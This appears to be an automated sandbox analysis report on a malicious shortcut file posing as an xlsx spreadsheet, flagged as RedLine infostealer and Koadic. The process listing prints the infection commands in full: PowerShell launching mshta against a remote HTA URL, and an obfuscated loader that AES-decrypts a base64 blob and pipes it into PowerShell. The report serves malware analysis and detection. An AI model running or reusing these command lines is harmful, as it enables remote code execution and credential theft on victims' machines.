Source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: Process Memory Space: powershell.exe PID: 7688, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\Public\Libraries\UcvuiswbO.bat, type: DROPPED	Matched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload

Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winLNK@26/26@5/4

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_02987F90 GetDiskFreeSpaceA,

19_2_02987F90

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

23_2_004019F0

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_02996D84 CoCreateInstance,

19_2_02996D84

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

23_2_004019F0

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\yt[1].hta

Jump to behavior

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bx55tq2v.0tl.ps1

Jump to behavior

Source: C:\Users\user\AppData\Roaming\uc.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Command line argument: 08A	23_2_00413780
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Command line argument: 08A	23_2_00413780
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Command line argument: 08A	23_1_00413780
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Command line argument: 08A	25_2_00413780

Source: C:\Users\user\AppData\Roaming\uc.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: FT. 40FE CNY .xlsx.lnk	ReversingLabs: Detection: 31%
Source: FT. 40FE CNY .xlsx.lnk	Virustotal: Detection: 24%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF\Clas\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW \| powershell -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\uc.exe "C:\Users\user\AppData\Roaming\uc.exe"
Source: C:\Users\user\AppData\Roaming\uc.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\uc.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF
Source: C:\Users\user\AppData\Roaming\uc.exe	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Ucvuiswb.PIF "C:\Users\Public\Libraries\Ucvuiswb.PIF"
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Ucvuiswb.PIF "C:\Users\Public\Libraries\Ucvuiswb.PIF"
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW \| powershell -	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\uc.exe "C:\Users\user\AppData\Roaming\uc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
